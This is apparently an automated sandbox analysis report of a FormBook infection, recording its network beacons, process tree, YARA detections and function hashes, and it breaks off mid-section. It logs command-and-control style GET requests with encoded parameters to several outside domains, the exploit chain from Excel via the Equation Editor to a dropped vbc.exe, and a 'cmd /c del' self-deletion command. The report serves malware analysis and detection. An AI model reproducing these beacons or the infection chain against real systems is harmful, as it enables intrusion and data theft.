Nov 26, 2020 21:17:20.869579077 CET	540	OUT	GET /mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn HTTP/1.1 Host: www.tennessyherb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:17:21.088021040 CET	541	IN	HTTP/1.1 403 Forbidden Date: Thu, 26 Nov 2020 20:17:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 151 X-Sorting-Hat-ShopId: 46403911832 X-Dc: gcp-us-central1 X-Request-ID: 9c532ece-10f9-4959-a97a-782aa8c8f781 X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 06a7cd1bec0000c290c83e0000000001 Server: cloudflare CF-RAY: 5f864ad97d91c290-FRA Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it
Nov 26, 2020 21:17:21.088128090 CET	542	IN	Data Raw: 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72 65 6d 20 32 2e 35 Data Ascii: ems:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-colo
Nov 26, 2020 21:17:21.088161945 CET	544	IN	Data Raw: 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a 20 7b 0a 20 20 20 Data Ascii: ent-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "Adgang
Nov 26, 2020 21:17:21.088202953 CET	545	IN	Data Raw: 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0 a4 a4 20 e0 a4 95 Data Ascii: " }, "ja": { "title": "", "content-title": "
Nov 26, 2020 21:17:21.088233948 CET	546	IN	Data Raw: 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20 20 20 69 66 20 28 Data Ascii: lations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace langua
Nov 26, 2020 21:17:21.088260889 CET	546	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49170	67.195.197.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:17:26.564904928 CET	547	OUT	GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg== HTTP/1.1 Host: www.bestpodstudio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:17:26.764904022 CET	547	IN	HTTP/1.1 400 Bad Request Date: Thu, 26 Nov 2020 20:17:26 GMT P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Vary: Accept-Encoding Content-Length: 138 Content-Type: text/html; charset=iso-8859-1 Age: 0 Connection: close Server: ATS/7.1.2 Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 0a 3c 21 2d 2d 20 70 31 31 77 35 2e 67 65 6f 2e 62 66 31 2e 79 61 68 6f 6f 2e 63 6f 6d 20 54 68 75 20 4e 6f 76 20 32 36 20 31 32 3a 31 37 3a 32 36 20 50 53 54 20 32 30 32 30 20 2d 2d 3e 0a Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>400 - Bad Request... p11w5.geo.bf1.yahoo.com Thu Nov 26 12:17:26 PST 2020 -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49171	102.141.201.70	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:17:32.031821966 CET	548	OUT	GET /mz59/?u2M0SF6h=OYXdaeXg9F3JN4qYjwOEDyjla/tUwsNCNX4C8lXWM8yJouL0vi1vAZ6NQlgRanHRrjTU7w==&rFN0=Xrx4qn HTTP/1.1 Host: www.xjcg168.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:17:32.230328083 CET	548	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 Date: Thu, 26 Nov 2020 20:17:32 GMT Connection: close Content-Length: 57 Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49172	74.208.236.61	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:17:42.485991955 CET	549	OUT	GET /mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn HTTP/1.1 Host: www.pellatrap.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:17:42.628258944 CET	550	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Thu, 26 Nov 2020 20:17:42 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
Nov 26, 2020 21:17:42.628302097 CET	551	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2196 Parent PID: 584

General

Start time:	21:15:37
Start date:	26/11/2020
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f490000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2348 Parent PID: 584

General

Start time:	21:15:56
Start date:	26/11/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2436 Parent PID: 2348

General

Start time:	21:15:58
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xf90000
File size:	515072 bytes
MD5 hash:	4A105D55BFF1F7304E01CE7198BADA6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2133084587.0000000002638000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 25%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2768 Parent PID: 2436

General

Start time:	21:16:01
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xf90000
File size:	515072 bytes
MD5 hash:	4A105D55BFF1F7304E01CE7198BADA6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2768

General

Start time:	21:16:02
Start date:	26/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 2792 Parent PID: 1388

General

Start time:	21:16:16
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf00000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2804 Parent PID: 2792

General

Start time:	21:16:20
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4abf0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2436 Parent PID: 2348 vbc.exeCOMMON

Executed Functions

Function 0021366A, Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

TVDm, xrefs: 00213695

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: TVDm
API String ID: 0-2852946447
Opcode ID: 2206ef87705b9468ca4353b201a0e01414131b540ae955cdb24b4bc935495584
Instruction ID: 8ffffa25f666e3f55fc6dceec4c271b14289f9fca784fa0b59b339016731283d
Opcode Fuzzy Hash: 2206ef87705b9468ca4353b201a0e01414131b540ae955cdb24b4bc935495584
Instruction Fuzzy Hash: A022C074915228CFDB64CF64C944BE9BBF6BF59304F2081A9D509AB261DBB09ED4CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00210D0A, Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 102fa5e288a7981c973129362d7663e23c782a7dbee23c642bc1b253c7b8abb3
Instruction ID: 8aec9ecfb59dfeb4b1c828af117232b6f826e16171a1eec48d36a14edc8b78cb
Opcode Fuzzy Hash: 102fa5e288a7981c973129362d7663e23c782a7dbee23c642bc1b253c7b8abb3
Instruction Fuzzy Hash: BAE1F834A102088FCB04DFB4C8959DEBBB2FF9A304F558569D409AB365DB35AD86CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00210560, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4a35dc2b7cfb203ba1508ca18d1ce6e137b77dd3f295ff226e468fb051edd6
Instruction ID: 2dc0b99afb240ca665666ca84b6099ad2ab78cff8facb474d5577e9908b0fc1b
Opcode Fuzzy Hash: da4a35dc2b7cfb203ba1508ca18d1ce6e137b77dd3f295ff226e468fb051edd6
Instruction Fuzzy Hash: F6E1F634A102088FCB04DFB4C8959DEBBB2FF9A318F548569D409AB365DB35AD86CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002163C4, Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97625d8756af1013a8c9822d54cedb5326d807a66019b101ccd3306f0fdf24f
Instruction ID: 57ab1debcbe8f48cab23e3d762b2266da253ae19cacbca98d40ba03021ced30d
Opcode Fuzzy Hash: e97625d8756af1013a8c9822d54cedb5326d807a66019b101ccd3306f0fdf24f
Instruction Fuzzy Hash: 66A14878A24149CFCB04CFA9D4849EEBBF6FB98300B249559E806EB345D774D992CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002121D0, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50bde0d81453300171a8c0f300732677af023bed54db7b197a1f7726231b714
Instruction ID: 8274654ed13656d47d10cc45ca263fcd8d89ce423999579ac74d44aab8d5d7e2
Opcode Fuzzy Hash: c50bde0d81453300171a8c0f300732677af023bed54db7b197a1f7726231b714
Instruction Fuzzy Hash: 8F711370E14259CFCB04CFA9C4806EEFBF2BF99300F248425E819AB255D77499A5DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021F650, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 222processCOMMON

Download Yara Rule

APIs

